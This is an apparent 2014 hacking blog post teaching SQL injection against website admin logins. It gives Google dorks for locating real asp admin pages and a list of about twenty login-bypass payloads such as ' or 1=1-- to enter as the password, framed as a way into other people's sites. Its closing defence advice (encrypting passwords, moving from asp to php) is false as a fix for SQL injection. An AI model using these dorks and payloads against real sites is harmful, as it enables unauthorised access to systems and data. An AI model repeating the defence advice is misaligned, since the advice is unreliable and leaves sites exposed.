Friday, July 25, 2014

How to hack a website : SQL Injection

Hello friends 
Today, I bring to you another hacking trick/method with SQL INJECTION..
What do we understand by sql injection?
A injecting sql queries into another database or using queries to get authentication bypass as an admin.
Part 1
Basic sql injection Gaining authentication bypass on an admin account. Most sites vulnerable to this are asp.net, So first we need to find a site, start by opening Google.Now we type our dork: “definition of dork” ‘a search entry for a certain type of site/exploit”

There is a large number of google dork for basic sql injection.
Here are the best:
  • “inurl:login/admin.asp
  • “inurl:admin.asp
  • “inurl:admin/login.asp
  • “inurl:adminlogin.asp
  • “inurl:adminhome.asp
  • “inurl:admin_login.asp
  • “inurl:administratorlogin.asp
  • “inurl:login/administrator.asp
  • “inurl:administrator_login.asp
Now what to do once we get to our site. the site should look something like this :
Welcome to xxxxxxxxxx administrator panel

Username :

Password :
So what we do here is in the USERNAME, we always type “Admin” as the username and for our PASSWORD we type our sql injection.
Here is a list of sql injections..
  • ‘ or ’1′=’1
  • ‘ or ‘x’=’x
  • ‘ or 0=0 –
  • or 0=0 –
  • ‘ or 0=0 #
  • ” or 0=0 #
  • or 0=0 #
  • ‘ or ‘x’=’x
  • ” or “x”=”x
  • ‘) or (‘x’=’x
  • ‘ or 1=1–
  • ” or 1=1–
  • or 1=1–
  • ‘ or a=a–
  • ” or “a”=”a
  • ‘) or (‘a’=’a
  • “) or (“a”=”a
  • hi” or “a”=”a
  • hi” or 1=1 –
  • hi’ or 1=1 –
  • ‘or’1=1′

TYPE ANY ONE OF THESE IN PASSWORD SPACE… There are many more but these are the best ones that i know.
What this sql injection is doing :

Confusing the database till it gives you authentication bypass. So your input should look like this

username: Admin

password: ’or’1′=’1
So click submit and you're in .................... Wow
Note: Not all sites are vulnerable

HOW TO SECURE YOUR SITE FROM THIS ATTACK
1- Put encryption on the passwords.
2- Change the platform of your website from asp to php.
Reactions:

2 comments:

Post a Comment